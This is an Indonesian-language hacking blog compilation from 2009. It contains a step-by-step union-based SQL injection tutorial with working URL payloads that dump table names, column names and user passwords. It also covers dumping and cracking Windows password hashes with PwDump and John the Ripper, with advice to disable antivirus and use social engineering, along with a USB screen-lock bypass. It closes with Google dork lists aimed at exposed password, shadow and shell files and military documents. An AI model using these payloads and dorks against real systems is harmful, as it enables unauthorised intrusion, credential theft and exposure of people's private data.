4 Langkah Mudah SQL injection

------------------------------------------------------

Author : ^k4c0n9^

Contact : mafiaexc@yahoo.com ==> http://WWW.MAHANATHAN.BLOGSPOT.COM

Copyright (c) 2009 www.mahanathan.blogspot.com All Rights Reserved

19/05/2009 02:45:00 WIB

------------------------------------------------------

dikutip dari : http://xshadow-power.com

Berikut saya akan menerangkan SQLinjection dengan 4 langkah.

Yang saya akan bahas disini bagaimana mencari/membaca table serta column dengan cepat… dengan query “group”

Concept:

1. mencari nomor togel
2. membaca table
3. membaca column table
4. result

teknik:

1. mencari nomor togel

saya rasa rekan-rekan sudah tau cara mencari nomer togel… jadi tidak usah saya bahas disini…

example:

http://127.0.0.1/VULN.php?id=-199+union+select+1,2,3,4,5,6,7,8,9,10,11,12--

dan diketahui nomer togelnya sebagai berikut:

2. membaca table

berikut cara query “group” untuk membaca table

query yang digunakan sebagai berikut:

group_concat(table_name)

code diatas dimasukkan di salah satu nomer togel dan dibelakang url ditambahkan emblem berikut untuk membaca table dalam database:

+from+information_schema.tables+where+table_schema=database()--

Example:

http://127.0.0.1/VULN.php?id=-199+union+select+1,2,3,4 5, group_concat(table_name),7,8,9,10,11,12+from+information_schema.tables+where+tables_chema=database()--

dimana query diatas dimasukkan di nomer togel 6

kemudian munculah table database secara berurutan sebagai berikut:

3. membaca column table

setelah didapatkan nama table, kita akan membaca column dari table yang kita dapat dengan query sebagai berikut:

group_concat(column_name)

dan emblem yang disertakan pada belakang url sebagai berikut ini:

+from+information_schema.columns+where+table_name=CODE EQUIVALENT HEX VALUE Table

Dimana “CODE EQUIVALENT HEX VALUE Table” didapatkan dari convert “STRING àEQUIVALENT HEX VALUE”

Dan saya biasa menggunakan tools berikut: http://xshadow-power.com/tools

Dan pada gambar sebelumnya… table yang akan kit baca columnya adalah “muser” dan telah didapatkan dari hasil confert dari muser adalah 0x6D75736572

Example:

http://127.0.0.1/VULN.php?id=-199+union+select+1,2,3,4 5, group_concat(column_name),7,8,9,10,11,12 +from+information_schema.columns+where+table_name=0x6D75736572--

dan result yang didapatkan dari query ini sebagai berikut:

4. result

setelah mendapatkan apa yang kita cari pada langkah 2 & 3 diatas… sa’atnya membaca ISI dari column dari table muser yaitu “uid,pass”

query yang digunakan sebagai berikut:

concat_ws(nama column yang akan dibaca)

dan ditambahkan emblem dibelakang url sebagi berikut

+from+nama column table yang akan dibaca--

Example:

http://127.0.0.1/VULN.php?id=-1107+union+select+1,2,3,4,5,concat_ws(0x3a,uid,pwd),7,8,9,10,11,12+from+muser--

dan result dari yang kita baca diatas sebagai berikut:

Akhirnya selesai juga tutorialnya J

Sekian saja… terima kasih.

Cacian, makian, saran, kritik mohon dilayangkan ke email berikut: admin[at]cukdus[dot]org

Regard

Xshadow

No greetzz

Only thanks to:

Inc0mp13te, IndoUnderground, cyber_tomat, gblack, k0il, jack-, X-Code community, CukDu$ community, dan temen2 yang lupa namanya lom saya sebutkan hehehe…

Mengetahui IP Address Pengirim Email

------------------------------------------------------

Author : ^k4c0n9^

Contact : mafiaexc@yahoo.com ==> WWW.MAHANATHAN.BLOGSPOT.COM

Copyright (c) 2009 www.mahanathan.blogspot.com All Rights Reserved

18/05/2009 02:45:00 WIB

------------------------------------------------------

Saat Anda membaca email mungkin hanya terlihat informasi date, to, cc, bcc, subject dan message. Padahal setiap email yang terkirim pasti menyertakan informasi yang lengkap seperti message id, mailer, ip address, dan sebagainya.

Kalau Anda ingin mengetahui ip address pengirim email beserta isp yang digunakan Anda bisa membaca tips berikut ini.

Yahoo Mail:

1. Login ke Yahoo Mail.

2. Pilih salah satu email yang ingin Anda cek.

3. Klik pada menu atau link Full Header yang terletak di kanan bawah.

4. Cari tulisan “Received: from [...] by”.

5. Pada contoh di bawah ini IP addressnya adalah 61.94.152.147.

MS Outlook Express:

1. Buka program Outlook Express.

2. Klik kanan pada salah satu email yang ingin Anda cek.

3. Klik menu Properties.

4. Klik tab Detail.

HACK WINDOWS XP SP2

------------------------------------------------------

Author : ^k4c0n9^

Contact : mafiaexc@yahoo.com ==> WWW.MAHANATHAN.BLOGSPOT.COM

Copyright (c) 2009 www.mahanathan.blogspot.com All Rights Reserved

28/11/2006 02:45:00 WIB

------------------------------------------------------

Hai…….semua ???? disini kami akan menyajikan bagaimana untuk melihat password admin dan user dari OS Windows SP2……………dengan menggunakan PwDump dan John The Ripper ,,,,,,,,,,,,,,,,,,,,,,,,ini adalah artikel perdanaq jadi untuk yang sudah tahu diharamkan membaca lebih lanjut karena akan berdampak pada kesehatan mata anda…….he3x,,,,,,,,,,,,,,,,,,,n’ aq juga berterima kasih kepada temen2 dari YF Regional Probolinggo yang sudah mengadakan “Seminar Hacking Windows SP2” sehingga kami bisa menularkan ilmu yang telah kami dapat dari seminar itu khususnya buat Phy_cole, stressdesign, dan kawan2 yang lain………………………..Cogito ergo sum !!!!!

------------------------------------------------------------------------------------------------------------

Oke biar tidak terlau lama dan bertele-tele marilah kita mulai petualangan kita dengan penuh rasa deg-degan (maaf terlalu serius sampe’2 deg-degan),

Sebelum kita mulai berpetualang siapkan dulu :

1. Alat yang akan dipakai (PwDump & John The Ripper)
2. Bacalah basmalah sebelum memulai biar gak ada setan yang mengganggu
3. Peralatan ini hanya bisa di install di user yang tidak limited, jadi jika anda berda pada user yang accountnya limited gunakan social engginering agar kita bisa mengakses peralatan tersebut
4. Jika ada anti virus yang aktif langsung di disable saja biar tidak mengganggu
5. Jangan lupa camilannya juga atau rokok…….pokoknya yang bisa kamu nikmati deh…………………….

------------------------------------------------------------------------------------------------------------

Setelah kita siap semua mari kita mulai petualangan kita ! let’s go……..!!!!!>>>>>>>>

1. Pertama kita buka dulu command prompt dengan perintah windows+R, lalu kita akan masuk pada kotak dialog run terus kita masukkan cmd,,,tekan enter……

2. Setelah itu akan tampil kotak dialog command prompt atau kami biasa menyebutnya DOS………….disitu kita jalankan peralatan pertama kita yaitu PwDump……..pada command prompt kita masukkan untuk pindah ke directori di mana kita menyimpan file PwDump

3. Setelah kita masuk di directori file PwDump kita masuk pada PwDumpRelease(sekadar catatan * untuk file PwDump yang masih dalam keadaan terkompres harap di extract terlebih dahulu), setelah itu ketikkan perintah ini PwDump.exe -o pass.txt 127.0.0.1, tekan enter………………. Setelah itu kita akan mendapat pemberitahuan di akhir process “The command completed Succesfully”

4. Setelah itu kita buka explorer kita masuk pada file PwDump, terus masuk pada PwDumpRelease, setelah itu kita copy file pass.txt yang sudah terisi dengan password yang ter-enkripsi ke John The Ripper pada file RUN lalu paste……….

5. setelah itu kita masuk lagi pada command prompt…………..kita mulai meng-enkripsi file password yang telah kita dapatkan………di DOS kita masuk pada directory John The Ripper lalu John1701, lalu masuk pada file RUN…….kita jalankan John-386.Com untuk meng-enkrip file password kita dengan perintah John-386.com pass.txt lalu tekan enter …………………….

6. ya udah kita tunggu saja sampai semua file password yang kita dapatkan ter-enkrip semua………………………

udah dulu ya sampai sini dulu coz aq dah ngantuk nih !!!! sampai ketemu di artikel selanjutnya………. Semoga artikel ini bermanfaat bagi kalian……!!!! Bye…..BY3……

Note : Kami tidak bertanggung jawab atas semua masalah yang akan terjadi, kami hanya ingin berbagi ilmu pada sohib – sohib semua !!!!!!

PENGGUNAAN & CARA LOLOS DARI PROGRAM YF –KeyInMyFD vers.1.0 (Mengunci Komputer Dengan USB Flash Disk)

------------------------------------------------------
Author : ^inj3ct^
Contact : mafiaexc@yahoo.com ==> WWW.MAHANATHAN.BLOGSPOT.COM
Copyright (c) 2009 www.mahanathan.blogspot.com All Rights Reserved
10/05/2009 02:45:00 WIB
------------------------------------------------------
Deskripsi program :
Key In My Hand adalah program pengunci komputer dengan
USB Flash Disk sebagai media.

Program ini bisa mencegah komputer anda dari akses fisik
user yang tidak diperbolehkan.

Cara menjalankan :
Program ini dijalankan dalam USb flash-disk kita dengan cara :
1. MENGUNCI KOMPUTER
Buka aplikasi ini, Klik “Find USB Flash Disk” untuk mencari path dimana USB berada pada computer kita, jika anda semua sudah tahu maka hal ini tidak perlu dilakukan……langsung ketikkan path dimana USB berda misal ; g:
Setelah Itu klik define, dimana anda diminta untuk menyimpan file kunci untuk membuka computer yang sudah di-lock.
Disini saya menyimpannya dengan nama yf.YFPCLOCK (anda bisa menggantinya dengan nama anda sendiri), lalu setelah itu klik save untuk menyimpannya pada USB kita, dan klik accept maka akan tampil kotak dialog lalu pilih OK, disini anda sudah bisa mengunci layar computer……..proses akan berjalan di belakang layar klik “LOCK” untuk mengunci dan cabutlah USB anda……………………….dan…….jreng ……….. semuanya tidak berfungsi…….mouse yang tidak bisa dijalankan dan tombol start yang hilang …………

2. Membuka kunci
Kita tadi telah mengunci komputer kita, nah sekarang bagaimana caranya untuk membukanya ? gampang kugh………tinggal kita colokin USB kita dan…….semua telah berfungsi sebagaimana mestinya………….GOOD Luck yo………..!!!!!!


CARA LOLOSNYA GIMANA ?
Nah ini nih yang akan aku bahas menurut pengalamanku tapi sebelumnya aku ingin cerita gimana pertamanya aku nemuin cara ini…………….:

Waktu itu aku baca majalahnya X-Code yang ke-12 dan aku cobain program ini pertamanya aku cumin ngerti sedikit dari artikelnya…………karena disana gak diterangin filenya disimpan dimana (ato mungkin akunya za yang gak ngelihat) “sorry ya lo aq gak ngelihat coz aq cuman manusia biasa yang gak luput dari kesalan dan khlilaf” setelah aku ikuti petunjuknya maka aku simpan di dirve d: tapi koq gak da reaksinya ya ?
Setelah itu aq hapus lalu ternyata layar jadi terkunci……^%^ waduh bingung nih lalu aq restart aza komputernya eh….ternyata setelah masuk ke windows udah gak terkunci lagi……..syukur gue kalo gak bisa terbuka ntar aku dimarahin ama ortuq coz itu komputernya ortuq bukan punya Q …..............ya udah setelah itu aku simpan di USB ku file kuncinya dan ternyata aq bisa untuk ngunci dan membukanya ……….

Maaf k-lo artikel nie hanya membuat kakak-kakak dan kawan2 jadi boring karena cara bukanya cuman di-restart aja tapi semoga aza bisa menambah ilmu pengetahuan kita…..untuk yang mau minta programnya silahkan request ke : mafiaexc@yahoo.com

Video Hacking

Maraknya video hacking yang bertebaran secara gratis akan membuat ilmu kita semakin bertambah. disini kami menemukan harta karun luar biasa, video hacking academy, mulai dari Ethical Hacking, Penetration Testing, Footprinting, Reconnaissance, TCP IP Basics ,Scanning, Honeypots, Honeynets sampai dengan wireless hacking pun dibahas dalam video. Yang lebih menarik lagi, didalamnya di sediakan demo penetration testing lebih dari 300+ vulnerability. :D---- dan tentunya sebanding dengan kapasitasnya yang lebih dari 3 GB.

Silahkan bagi yang tertarik untuk mendownloadnya :

-Training Module 1 Ethical Hacking and Penetration Testing - cd 1 - 250 mb

http://rapidshare.com/files/6870957/traininga.part1.rar.html

http://rapidshare.com/files/6875509/traininga.part2.rar.html

http://rapidshare.com/files/6880184/traininga.part3.rar.html

http://rapidshare.com/files/6884786/traininga.part4.rar.html

http://rapidshare.com/files/6889797/traininga.part5.rar.html

http://rapidshare.com/files/6890170/traininga.part6.rar.html

------------------------------------------------------------

-Training Module 2 Footprinting and Reconnaissance - cd 2 - 210 mb

http://rapidshare.com/files/6920123/trainingb.part1.rar.html

http://rapidshare.com/files/6925380/trainingb.part2.rar.html

http://rapidshare.com/files/6930474/trainingb.part3.rar.html

http://rapidshare.com/files/6935598/trainingb.part4.rar.html

http://rapidshare.com/files/6937268/trainingb.part5.rar.html

------------------------------------------------------------

-Training Module 3 TCP IP Basics and Scanning - cd 3 - 153 mb

http://rapidshare.com/files/6950222/trainingc.part1.rar.html

http://rapidshare.com/files/6954540/trainingc.part2.rar.html

http://rapidshare.com/files/6958405/trainingc.part3.rar.html

http://rapidshare.com/files/6958651/trainingc.part4.rar.html

------------------------------------------------------------

-Training Module 4 Enumeration and Verification - cd 4 - 200 mb

http://rapidshare.com/files/6995889/trainingd.part1.rar.html

http://rapidshare.com/files/6999123/trainingd.part2.rar.html

http://rapidshare.com/files/7002551/trainingd.part3.rar.html

http://rapidshare.com/files/7005909/trainingd.part4.rar.html

http://rapidshare.com/files/7006074/trainingd.part5.rar.html

------------------------------------------------------------

-Training Module 5 Hacking Defending Wireless Modems - cd 5 - 94 mb

http://rapidshare.com/files/7017480/traininge.part1.rar.html

http://rapidshare.com/files/7021255/traininge.part2.rar.html

------------------------------------------------------------

-Training Module 6 Hacking Defending Web Servers - cd 6 - 150 mb

http://rapidshare.com/files/7029199/trainingf.part1.rar.html

http://rapidshare.com/files/7034545/trainingf.part2.rar.html

http://rapidshare.com/files/7039580/trainingf.part3.rar.html

http://rapidshare.com/files/7040200/trainingf.part4.rar.html

------------------------------------------------------------

-Training Module 7 Hacking Defending Web Applications - cd 7 - 110 mb

http://rapidshare.com/files/7049302/trainingg.part1.rar.html

http://rapidshare.com/files/7054559/trainingg.part2.rar.html

http://rapidshare.com/files/7056051/trainingg.part3.rar.html

------------------------------------------------------------

-Training Module 8 Sniffers and Session Hijacking - cd 8 - 115 mb

http://rapidshare.com/files/7069844/trainingh.part1.rar.html

http://rapidshare.com/files/7076146/trainingh.part2.rar.html

http://rapidshare.com/files/7084439/trainingh.part3.rar.html

------------------------------------------------------------

-Training Module 9 Hacking Defending Windows Systems - cd 9 - 120 mb

http://rapidshare.com/files/7090868/trainingi.part1.rar.html

http://rapidshare.com/files/7095821/trainingi.part2.rar.html

http://rapidshare.com/files/7097885/trainingi.part3.rar.html

------------------------------------------------------------

-Training Module 10 Hacking Defending Unix Systems - cd 10 - 150 mb

http://rapidshare.com/files/7136591/trainingJ.part1.rar.html

http://rapidshare.com/files/7139658/trainingJ.part2.rar.html

http://rapidshare.com/files/7142501/trainingJ.part3.rar.html

------------------------------------------------------------

-Training Module 11 Rootkits Backdoors Trojans Tunnels - cd 11 - 115 mb

http://rapidshare.com/files/7147118/trainingk.part1.rar.html

http://rapidshare.com/files/7159091/trainingk.part2.rar.html

http://rapidshare.com/files/7160611/trainingk.part3.rar.html

------------------------------------------------------------

-Training Module 12 Denial of Service and Botnets - cd 12 - 100 mb

http://rapidshare.com/files/7182977/trainingL.part1.rar.html

http://rapidshare.com/files/7187533/trainingL.part2.rar.html

------------------------------------------------------------

-Training Module 13 Automated Pen Testing Tools - cd 13 - 102 mb

http://rapidshare.com/files/7202752/trainingm.part1.rar.html

http://rapidshare.com/files/7208149/trainingm.part2.rar.html

http://rapidshare.com/files/7208549/trainingm.part3.rar.html

------------------------------------------------------------

-Training Module 14 Intrusion Detection Systems - cd 14 - 140 mb

http://rapidshare.com/files/7224433/trainingn.part1.rar.html

http://rapidshare.com/files/7230417/trainingn.part2.rar.html

http://rapidshare.com/files/7234950/trainingn.part3.rar.html

------------------------------------------------------------

-Training Module 15 Firewalls - cd 15 - 160 mb

http://rapidshare.com/files/7252545/trainingo.part1.rar.html

http://rapidshare.com/files/7255895/trainingo.part2.rar.html

http://rapidshare.com/files/7258850/trainingo.part3.rar.html

http://rapidshare.com/files/7259491/trainingo.part4.rar.html

-

Google Hack

disini kami berikan keyword unutk mencari sesuatu di google, moga bermanfaat bagi anda semua....:
op keyword google search engine:
“index of /root”
http://www.google.com/search?hl=en&ie=UT...

“Index of /admin”
“Index of /phpshell.php”
“Index of /cgitelnet.pl”
“Index of /album.pl”
“Index of /order”
“Index of /payment”
“Index of /password”
“Index of /mail”
“Index of /” +passwd
“Index of /”
+password.txt
“Index of /” +.htaccess
index of ftp +.mdb
allinurl:/cgi-bin/ +mailto

allinurl:”shop.mdb”
http://www.google.com/search?hl=en&lr=&i... 22shop.mdb%22

allintitle: “index of/admin”
allintitle: “index of/root”
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
inurl:passwd filetype:txt
inurl:admin filetype:db
inurl:iisadmin
inurl:”auth_user_file.txt”
inurl:”wwwroot/*.”
top secret site:mil
confidential site:mil allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history

intitle:”Index of” .sh_history
intitle:”Index of” .bash_history
intitle:”index of” passwd
intitle:”index of” people.lst
intitle:”index of” pwd.db
intitle:”index of” etc/shadow
intitle:”index of” spwd
intitle:”index of” master.passwd
intitle:”index of” htpasswd
intitle:”index of” members OR accounts
intitle:”index of” user_carts OR user_cart

=[ ALTERNATIF INPUT (^_-) ]=

_vti_inf.html
service.pwd
users.pwd
authors.pwd
administrators.pwd
shtml.dll
shtml.exe
fpcount.exe
default.asp
showcode.asp
sendmail.cfm
getFile.cfm
imagemap.exe
test.bat
msadcs.dll
htimage.exe
counter.exe
browser.inc
hello.bat
default.asp
dvwssr.dll
cart32.exe
add.exe

index.jsp
SessionServlet
shtml.dll
index.cfm
page.cfm
shtml.exe
web_store.cgi
shop.cgi
upload.asp
default.asp
pbserver.dll
phf
test-cgi
finger
Count.cgi
jj
php.cgi
php
nph-test-cgi
handler
webdist.cgi
webgais
websendmail
faxsurvey
htmlscript
perl.exe
wwwboard.pl
www-sql
view-source
campas
aglimpse
glimpse
man.sh
AT-admin.cgi
AT-generate.cgi
filemail.pl
maillist.pl
info2www
files.pl
bnbform.cgi
survey.cgi

classifieds.cgi
wrap
cgiwrap
edit.pl
perl
names.nsf
webgais
dumpenv.pl
test.cgi
submit.cgi
guestbook.cgi
guestbook.pl
cachemgr.cgi
responder.cgi
perlshop.cgi
query
w3-msql
plusmail
htsearch
infosrch.cgi

publisher
ultraboard.cgi
db.cgi
formmail.cgi
allmanage.pl
ssi
adpassword.txt
redirect.cgi
cvsweb.cgi
login.jsp
dbconnect.inc
admin
htgrep
wais.pl
amadmin.pl
subscribe.pl
news.cgi
auctionweaver.pl
.htpasswd
acid_main.php
access.log
log.htm
log.html
log.txt
logfile
logfile.htm
logfile.html
logfile.txt
logger.html
stat.htm
stats.htm
stats.html
stats.txt
webaccess.htm
wwwstats.html
source.asp
perl
mailto.cgi
YaBB.pl
mailform.pl
cached_feed.cgi
global.cgi
Search.pl
build.cgi
common.php
show
global.inc
ad.cgi
WSFTP.LOG
index.html~
index.php~
index.html.bak
index.php.bak
print.cgi
register.cgi
webdriver
bbs_forum.cgi
mysql.class
sendmail.inc
CrazyWWWBoard.cgi
search.pl
way-board.cgi
webpage.cgi
pwd.dat
adcycle
post-query
help.cgi
materi referensi:
search engine zuula jg boleh di coba search engine yg cerdik yg memanfaatkan keunggulan database dari hampir semua search engine termasuk google

http://www.zuula.com/?utm_source=google&...